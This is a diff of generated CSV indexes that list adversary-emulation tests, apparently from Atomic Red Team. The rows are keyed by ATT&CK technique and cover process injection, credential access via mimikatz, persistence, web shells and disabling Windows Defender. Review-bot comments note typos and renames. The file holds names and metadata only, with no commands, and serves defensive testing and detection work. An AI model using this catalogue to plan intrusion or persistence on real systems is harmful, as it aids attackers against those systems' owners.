+privilege-escalation,T1055.012,Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell +privilege-escalation,T1055.012,Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell +privilege-escalation,T1055,Process Injection,1,Shellcode 
execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell +privilege-escalation,T1055,Process Injection,2,Remote Process Injection in LSASS via mimikatz,3203ad24-168e-4bec-be36-f79b13ef8a83,command_prompt +privilege-escalation,T1037.004,RC Scripts,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1d163e762de,bash +privilege-escalation,T1547.007,Re-opened Applications,1,Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,manual +privilege-escalation,T1547.007,Re-opened Applications,2,Re-Opened Applications,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh +privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,1,Reg Key Run,e55be3fd-3521-4610-9d1a-e210e42dcf05,command_prompt +privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,2,Reg Key RunOnce,554cbd88-cde1-4b56-8168-0be552eed9eb,command_prompt +privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,3,PowerShell Registry RunOnce,eb44f842-0457-4ddc-9b92-c4caa144ac42,powershell +privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,4,Suspicious vbs file run from startup Folder,2cb98256-625e-4da9-9d44-f2e5f90b8bd5,powershell +privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,5,Suspicious jse file run from startup Folder,dade9447-791e-4c8f-b04b-3a35855dfa06,powershell +privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,6,Suspicious bat file run from startup Folder,5b6768e4-44d2-44f0-89da-a01d1430fd5e,powershell +privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,7,Add Executable Shortcut Link to User Startup Folder,24e55612-85f6-4bd6-ae74-a73d02e3441d,powershell +privilege-escalation,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt +privilege-escalation,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt +privilege-escalation,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt 
+privilege-escalation,T1053.005,Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd,powershell +privilege-escalation,T1053.005,Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8726-2c5c673414d3,powershell +privilege-escalation,T1053.005,Scheduled Task,6,WMI Invoke-CimMethod Scheduled Task,e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b,powershell +privilege-escalation,T1546.002,Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt +privilege-escalation,T1547.005,Security Support Provider,1,Modify SSP configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell +privilege-escalation,T1574.011,Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell +privilege-escalation,T1574.011,Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt +privilege-escalation,T1548.001,Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh +privilege-escalation,T1548.001,Setuid and Setgid,2,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh +privilege-escalation,T1548.001,Setuid and Setgid,3,Set a SetGID flag on file,db55f666-7cba-46c6-9fe6-205a05c3242c,sh +privilege-escalation,T1547.009,Shortcut Modification,1,Shortcut Modification,ce4fc678-364f-4282-af16-2fb4c78005ce,command_prompt +privilege-escalation,T1547.009,Shortcut Modification,2,Create shortcut to cmd in startup folders,cfdc954d-4bb0-4027-875b-a1893ce406f2,powershell +privilege-escalation,T1037.005,Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh +privilege-escalation,T1548.003,Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh +privilege-escalation,T1548.003,Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh 
+privilege-escalation,T1548.003,Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh +privilege-escalation,T1543.002,Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash +privilege-escalation,T1053.006,Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash +privilege-escalation,T1134.001,Token Impersonation/Theft,1,Named pipe client impersonation,90db9e27-8e7c-4c04-b602-a45927884966,powershell +privilege-escalation,T1134.001,Token Impersonation/Theft,2,`SeDebugPrivilege` token duplication,34f0a430-9d04-4d98-bcb5-1989f14719f0,powershell +privilege-escalation,T1546.005,Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh +privilege-escalation,T1546.004,Unix Shell Configuration Modification,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh +privilege-escalation,T1546.004,Unix Shell Configuration Modification,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh +privilege-escalation,T1546.003,Windows Management Instrumentation Event Subscription,1,Persistence via WMI Event Subscription,3c64f177-28e2-49eb-a799-d767b24dd1e0,powershell +privilege-escalation,T1543.003,Windows Service,1,Modify Fax service to run PowerShell,ed366cde-7d12-49df-a833-671904770b9f,command_prompt +privilege-escalation,T1543.003,Windows Service,2,Service Installation CMD,981e2942-e433-44e9-afc1-8c957a1496b6,command_prompt +privilege-escalation,T1543.003,Windows Service,3,Service Installation PowerShell,491a4af6-a521-4b74-b23b-f7b3f1ee9e77,powershell +privilege-escalation,T1547.004,Winlogon Helper DLL,1,Winlogon Shell Key Persistence - PowerShell,bf9f9d65-ee4d-4c3e-a843-777d04f19c38,powershell +privilege-escalation,T1547.004,Winlogon Helper DLL,2,Winlogon Userinit Key Persistence - PowerShell,fb32c935-ee2e-454b-8fa3-1c46b42e8dfb,powershell +privilege-escalation,T1547.004,Winlogon Helper DLL,3,Winlogon Notify Key Logon Persistence - 
PowerShell,d40da266-e073-4e5a-bb8b-2b385023e5f9,powershell defense-evasion,T1055.004,Asynchronous Procedure Call,1,Process Injection via C#,611b39b7-e243-4c81-87a4-7145a90358b1,command_prompt defense-evasion,T1197,BITS Jobs,1,Bitsadmin Download (cmd),3c73d728-75fb-4180-a12f-6712864d7421,command_prompt defense-evasion,T1197,BITS Jobs,2,Bitsadmin Download (PowerShell),f63b8bc4-07e5-4112-acba-56f646f3f0bc,powershell @@ -378,6 +285,8 @@ defense-evasion,T1562.001,Disable or Modify Tools,21,Uninstall Crowdstrike Falco defense-evasion,T1562.001,Disable or Modify Tools,22,Tamper with Windows Defender Evade Scanning -Folder,0b19f4ee-de90-4059-88cb-63c800c683ed,powershell defense-evasion,T1562.001,Disable or Modify Tools,23,Tamper with Windows Defender Evade Scanning -Extension,315f4be6-2240-4552-b3e1-d1047f5eecea,powershell defense-evasion,T1562.001,Disable or Modify Tools,24,Tamper with Windows Defender Evade Scanning -Process,a123ce6a-3916-45d6-ba9c-7d4081315c27,powershell +defense-evasion,T1574.006,Dynamic Linker Hijacking,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash +defense-evasion,T1574.006,Dynamic Linker Hijacking,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash defense-evasion,T1055.001,Dynamic-link Library Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell defense-evasion,T1070.004,File Deletion,1,Delete a single file - Linux/macOS,562d737f-2fc6-4b09-8c2a-7f8ff0828480,sh defense-evasion,T1070.004,File Deletion,2,Delete an entire folder - Linux/macOS,a415f17e-ce8d-4ce2-a8b4-83b674e7017e,sh 
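Review bot: the re-added privilege-escalation rows carry test names with spelling errors inherited from the source atomic test definitions: `Enable Guest account with RDP capability and admin priviliges` (T1078.001), `Create local account with admin priviliges` (T1078.003) and `Persistance with Event Monitor - emond` (T1546.014). Because this index is generated, the fix belongs in those tests' definitions rather than in this CSV, otherwise the next regeneration reintroduces the typos. Note also that three technique titles change relative to the deleted rows while the test GUIDs stay the same: `Rc.common` becomes `RC Scripts` (T1037.004), `.bash_profile and .bashrc` becomes `Unix Shell Configuration Modification` (T1546.004), and `LD_PRELOAD` becomes `Dynamic Linker Hijacking` (T1574.006); anything that keys on the technique display name rather than the technique id needs the same rename. The genuinely new rows in this block are `T1055.004 Asynchronous Procedure Call` (`Process Injection via C#`) and the two `T1053.007 Container Orchestration Job` tests (`ListCronjobs`, `CreateCronjob`), which is what a reviewer of this commit actually needs to check.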
@@ -424,8 +333,6 @@ defense-evasion,T1218.004,InstallUtil,5,InstallUtil Uninstall method call - /U v defense-evasion,T1218.004,InstallUtil,6,InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall' variant,06d9deba-f732-48a8-af8e-bdd6e4d98c1d,powershell defense-evasion,T1218.004,InstallUtil,7,InstallUtil HelpText method call,5a683850-1145-4326-a0e5-e91ced3c6022,powershell defense-evasion,T1218.004,InstallUtil,8,InstallUtil evasive invocation,559e6d06-bb42-4307-bff7-3b95a8254bad,powershell -defense-evasion,T1574.006,LD_PRELOAD,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash -defense-evasion,T1574.006,LD_PRELOAD,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,1,chmod - Change file or folder mode (numeric mode),34ca1464-de9d-40c6-8c77-690adf36a135,bash defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,2,chmod - Change file or folder mode (symbolic mode),fc9d6695-d022-4a80-91b1-381f5c35aff3,bash defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,3,chmod - Change file or folder mode (numeric mode) recursively,ea79f937-4a4d-4348-ace6-9916aec453a4,bash 
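Review bot: the two `-defense-evasion,T1574.006,LD_PRELOAD` rows removed here have the same GUIDs (`39cb0e67-dd0d-4b74-a74b-c072db7ae991`, `bc219ff7-789f-4d51-9142-ecae3397deae`) as the `+defense-evasion,T1574.006,Dynamic Linker Hijacking` rows added in the preceding hunk, so this is a pure rename whose new title sorts the rows to a different position (after `Disable or Modify Tools`, before `Dynamic-link Library Injection`). Since rows within a tactic are evidently ordered by technique name, every future title change will show up as a delete/insert pair like this one; sorting by technique id instead would keep renames as one-line changes and make the history of this file reviewable.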
@@ -560,6 +467,105 @@ defense-evasion,T1220,XSL Script Processing,1,MSXSL Bypass using local files,ca2 defense-evasion,T1220,XSL Script Processing,2,MSXSL Bypass using remote files,a7c3ab07-52fb-49c8-ab6d-e9c6d4a0a985,command_prompt defense-evasion,T1220,XSL Script Processing,3,WMIC bypass using local XSL file,1b237334-3e21-4a0c-8178-b8c996124988,command_prompt defense-evasion,T1220,XSL Script Processing,4,WMIC bypass using remote XSL file,7f5be499-33be-4129-a560-66021f379b9b,command_prompt +persistence,T1546.008,Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell +persistence,T1546.008,Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt +persistence,T1098,Account Manipulation,1,Admin Account Manipulate,5598f7cb-cf43-455e-883a-f6008c5d46af,powershell +persistence,T1098,Account Manipulation,2,Domain Account and Group Manipulate,a55a22e9-a3d3-42ce-bd48-2653adb8f7a9,powershell +persistence,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt +persistence,T1546.011,Application Shimming,1,Application Shim Installation,9ab27e22-ee62-4211-962b-d36d9a0e6a18,command_prompt +persistence,T1546.011,Application Shimming,2,New shim database files created in the default shim database directory,aefd6866-d753-431f-a7a4-215ca7e3f13d,powershell +persistence,T1546.011,Application Shimming,3,Registry key creation and/or modification events for SDB,9b6a06f9-ab5e-4e8d-8289-1df4289db02f,powershell +persistence,T1053.001,At (Linux),1,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh +persistence,T1053.002,At (Windows),1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt +persistence,T1197,BITS Jobs,1,Bitsadmin Download (cmd),3c73d728-75fb-4180-a12f-6712864d7421,command_prompt +persistence,T1197,BITS Jobs,2,Bitsadmin Download 
(PowerShell),f63b8bc4-07e5-4112-acba-56f646f3f0bc,powershell +persistence,T1197,BITS Jobs,3,"Persist, Download, & Execute",62a06ec5-5754-47d2-bcfc-123d8314c6ae,command_prompt +persistence,T1197,BITS Jobs,4,Bits download using desktopimgdownldr.exe (cmd),afb5e09e-e385-4dee-9a94-6ee60979d114,command_prompt +persistence,T1176,Browser Extensions,1,Chrome (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual +persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual +persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual +persistence,T1176,Browser Extensions,4,Edge Chromium Addon - VPN,3d456e2b-a7db-4af8-b5b3-720e7c4d9da5,manual +persistence,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell +persistence,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell +persistence,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell +persistence,T1546.001,Change Default File Association,1,Change Default File Association,10a08978-2045-4d62-8c42-1957bbbea102,command_prompt +persistence,T1053.007,Container Orchestration Job,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash +persistence,T1053.007,Container Orchestration Job,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash +persistence,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash +persistence,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash +persistence,T1053.003,Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash +persistence,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt +persistence,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the 
Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt +persistence,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt +persistence,T1136.002,Domain Account,1,Create a new Windows domain admin user,fcec2963-9951-4173-9bfa-98d8b7834e62,command_prompt +persistence,T1136.002,Domain Account,2,Create a new account similar to ANONYMOUS LOGON,dc7726d2-8ccb-4cc6-af22-0d5afb53a548,command_prompt +persistence,T1136.002,Domain Account,3,Create a new Domain Account using PowerShell,5a3497a4-1568-4663-b12a-d4a5ed70c7d7,powershell +persistence,T1574.006,Dynamic Linker Hijacking,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash +persistence,T1574.006,Dynamic Linker Hijacking,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash +persistence,T1546.014,Emond,1,Persistance with Event Monitor - emond,23c9c127-322b-4c75-95ca-eff464906114,sh +persistence,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell +persistence,T1546.012,Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt +persistence,T1546.012,Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt +persistence,T1547.006,Kernel Modules and Extensions,1,Linux - Load Kernel Module via insmod,687dcb93-9656-4853-9c36-9977315e9d23,bash +persistence,T1543.001,Launch Agent,1,Launch Agent,a5983dee-bf6c-4eaf-951c-dbc1a7b90900,bash +persistence,T1543.004,Launch Daemon,1,Launch Daemon,03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf,bash +persistence,T1053.004,Launchd,1,Event Monitor Daemon Persistence,11979f23-9b9d-482a-9935-6fc9cd022c3e,bash +persistence,T1136.001,Local Account,1,Create a user account on a Linux system,40d8eabd-e394-46f6-8785-b9bfa1d011d2,bash 
+persistence,T1136.001,Local Account,2,Create a user account on a MacOS system,01993ba5-1da3-4e15-a719-b690d4f0f0b2,bash +persistence,T1136.001,Local Account,3,Create a new user in a command prompt,6657864e-0323-4206-9344-ac9cd7265a4f,command_prompt +persistence,T1136.001,Local Account,4,Create a new user in PowerShell,bc8be0ac-475c-4fbf-9b1d-9fffd77afbde,powershell +persistence,T1136.001,Local Account,5,Create a new user in Linux with `root` UID and GID.,a1040a30-d28b-4eda-bd99-bb2861a4616c,bash +persistence,T1136.001,Local Account,6,Create a new Windows admin user,fda74566-a604-4581-a4cc-fbbe21d66559,command_prompt +persistence,T1078.003,Local Accounts,1,Create local account with admin priviliges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt +persistence,T1037.002,Logon Script (Mac),1,Logon Scripts - Mac,f047c7de-a2d9-406e-a62b-12a09d9516f4,manual +persistence,T1037.001,Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt +persistence,T1546.007,Netsh Helper DLL,1,Netsh Helper DLL Registration,3244697d-5a3a-4dfc-941c-550f69f91a4d,command_prompt +persistence,T1137,Office Application Startup,1,Office Application Startup - Outlook as a C2,bfe6ac15-c50b-4c4f-a186-0fc6b8ba936c,command_prompt +persistence,T1137.002,Office Test,1,Office Application Startup Test Persistence,c3e35b58-fe1c-480b-b540-7600fb612563,command_prompt +persistence,T1137.004,Outlook Home Page,1,Install Outlook Home Page Persistence,7a91ad51-e6d2-4d43-9471-f26362f5738e,command_prompt +persistence,T1556.002,Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell +persistence,T1574.009,Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt +persistence,T1547.011,Plist Modification,1,Plist Modification,394a538e-09bb-4a4a-95d1-b93cf12682a8,manual +persistence,T1547.010,Port Monitors,1,Add Port Monitor 
persistence in Registry,d34ef297-f178-4462-871e-9ce618d44e50,command_prompt +persistence,T1546.013,PowerShell Profile,1,Append malicious start-process cmdlet,090e5aa5-32b6-473b-a49b-21e843a56896,powershell +persistence,T1037.004,RC Scripts,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1d163e762de,bash +persistence,T1547.007,Re-opened Applications,1,Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,manual +persistence,T1547.007,Re-opened Applications,2,Re-Opened Applications,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh +persistence,T1547.001,Registry Run Keys / Startup Folder,1,Reg Key Run,e55be3fd-3521-4610-9d1a-e210e42dcf05,command_prompt +persistence,T1547.001,Registry Run Keys / Startup Folder,2,Reg Key RunOnce,554cbd88-cde1-4b56-8168-0be552eed9eb,command_prompt +persistence,T1547.001,Registry Run Keys / Startup Folder,3,PowerShell Registry RunOnce,eb44f842-0457-4ddc-9b92-c4caa144ac42,powershell +persistence,T1547.001,Registry Run Keys / Startup Folder,4,Suspicious vbs file run from startup Folder,2cb98256-625e-4da9-9d44-f2e5f90b8bd5,powershell +persistence,T1547.001,Registry Run Keys / Startup Folder,5,Suspicious jse file run from startup Folder,dade9447-791e-4c8f-b04b-3a35855dfa06,powershell +persistence,T1547.001,Registry Run Keys / Startup Folder,6,Suspicious bat file run from startup Folder,5b6768e4-44d2-44f0-89da-a01d1430fd5e,powershell +persistence,T1547.001,Registry Run Keys / Startup Folder,7,Add Executable Shortcut Link to User Startup Folder,24e55612-85f6-4bd6-ae74-a73d02e3441d,powershell +persistence,T1098.004,SSH Authorized Keys,1,Modify SSH Authorized Keys,342cc723-127c-4d3a-8292-9c0c6b4ecadc,bash +persistence,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt +persistence,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt +persistence,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt 
+persistence,T1053.005,Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd,powershell +persistence,T1053.005,Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8726-2c5c673414d3,powershell +persistence,T1053.005,Scheduled Task,6,WMI Invoke-CimMethod Scheduled Task,e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b,powershell +persistence,T1546.002,Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt +persistence,T1547.005,Security Support Provider,1,Modify SSP configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell +persistence,T1574.011,Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell +persistence,T1574.011,Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt +persistence,T1547.009,Shortcut Modification,1,Shortcut Modification,ce4fc678-364f-4282-af16-2fb4c78005ce,command_prompt +persistence,T1547.009,Shortcut Modification,2,Create shortcut to cmd in startup folders,cfdc954d-4bb0-4027-875b-a1893ce406f2,powershell +persistence,T1037.005,Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh +persistence,T1543.002,Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash +persistence,T1053.006,Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash +persistence,T1505.002,Transport Agent,1,Install MS Exchange Transport Agent Persistence,43e92449-ff60-46e9-83a3-1a38089df94d,powershell +persistence,T1546.005,Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh +persistence,T1546.004,Unix Shell Configuration Modification,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh +persistence,T1546.004,Unix Shell Configuration Modification,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh 
+persistence,T1505.003,Web Shell,1,Web Shell Written to Disk,0a2ce662-1efa-496f-a472-2fe7b080db16,command_prompt +persistence,T1546.003,Windows Management Instrumentation Event Subscription,1,Persistence via WMI Event Subscription,3c64f177-28e2-49eb-a799-d767b24dd1e0,powershell +persistence,T1543.003,Windows Service,1,Modify Fax service to run PowerShell,ed366cde-7d12-49df-a833-671904770b9f,command_prompt +persistence,T1543.003,Windows Service,2,Service Installation CMD,981e2942-e433-44e9-afc1-8c957a1496b6,command_prompt +persistence,T1543.003,Windows Service,3,Service Installation PowerShell,491a4af6-a521-4b74-b23b-f7b3f1ee9e77,powershell +persistence,T1547.004,Winlogon Helper DLL,1,Winlogon Shell Key Persistence - PowerShell,bf9f9d65-ee4d-4c3e-a843-777d04f19c38,powershell +persistence,T1547.004,Winlogon Helper DLL,2,Winlogon Userinit Key Persistence - PowerShell,fb32c935-ee2e-454b-8fa3-1c46b42e8dfb,powershell +persistence,T1547.004,Winlogon Helper DLL,3,Winlogon Notify Key Logon Persistence - PowerShell,d40da266-e073-4e5a-bb8b-2b385023e5f9,powershell impact,T1531,Account Access Removal,1,Change User Password - Windows,1b99ef28-f83c-4ec5-8a08-1a56263a5bb2,command_prompt impact,T1531,Account Access Removal,2,Delete User - Windows,f21a1d7d-a62f-442a-8c3a-2440d43b19e5,command_prompt impact,T1531,Account Access Removal,3,Remove Account From Domain Admin Group,43f71395-6c37-498e-ab17-897d814a0947,powershell 
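Review bot: several test names in the @@ -560,6 +467,105 @@ persistence hunk carry typos that the generator will simply reproduce on the next run unless they are fixed in the source atomic YAML: "admin priviliges" (T1078.001 test 1 and T1078.003 test 1) and "Persistance with Event Monitor - emond" (T1546.014 test 1). In the same hunk both T1547.007 tests are named "Re-Opened Applications" (executors manual and sh), so the index cannot tell them apart; the sh variant should get a distinct name. Minor consistency points: "Powershell Cmdlet Scheduled Task" (T1053.005 test 4) against "PowerShell" everywhere else, and T1136.001 test 5 ("Create a new user in Linux with `root` UID and GID.") is the only name with a trailing period and backticks.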
@@ -719,6 +725,9 @@ discovery,T1124,System Time Discovery,2,System Time Discovery - PowerShell,1d571 execution,T1059.002,AppleScript,1,AppleScript,3600d97d-81b9-4171-ab96-e4386506e2c2,sh execution,T1053.001,At (Linux),1,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh execution,T1053.002,At (Windows),1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt +execution,T1609,Container Administration Command,1,ExecIntoContainer,d03bfcd3-ed87-49c8-8880-44bb772dea4b,bash +execution,T1053.007,Container Orchestration Job,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash +execution,T1053.007,Container Orchestration Job,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash execution,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash execution,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash execution,T1053.003,Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv index ababea45..8742ec79 100644 --- a/atomics/Indexes/Indexes-CSV/linux-index.csv +++ b/atomics/Indexes/Indexes-CSV/linux-index.csv 
@@ -1,43 +1,8 @@ Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name -privilege-escalation,T1546.004,.bash_profile and .bashrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh -privilege-escalation,T1546.004,.bash_profile and .bashrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh -privilege-escalation,T1053.001,At (Linux),1,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh -privilege-escalation,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash -privilege-escalation,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash -privilege-escalation,T1053.003,Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash -privilege-escalation,T1547.006,Kernel Modules and Extensions,1,Linux - Load Kernel Module via insmod,687dcb93-9656-4853-9c36-9977315e9d23,bash -privilege-escalation,T1574.006,LD_PRELOAD,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash -privilege-escalation,T1574.006,LD_PRELOAD,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash -privilege-escalation,T1548.001,Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh -privilege-escalation,T1548.001,Setuid and Setgid,2,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh -privilege-escalation,T1548.001,Setuid and Setgid,3,Set a SetGID flag on file,db55f666-7cba-46c6-9fe6-205a05c3242c,sh -privilege-escalation,T1548.003,Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh -privilege-escalation,T1548.003,Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh -privilege-escalation,T1548.003,Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh 
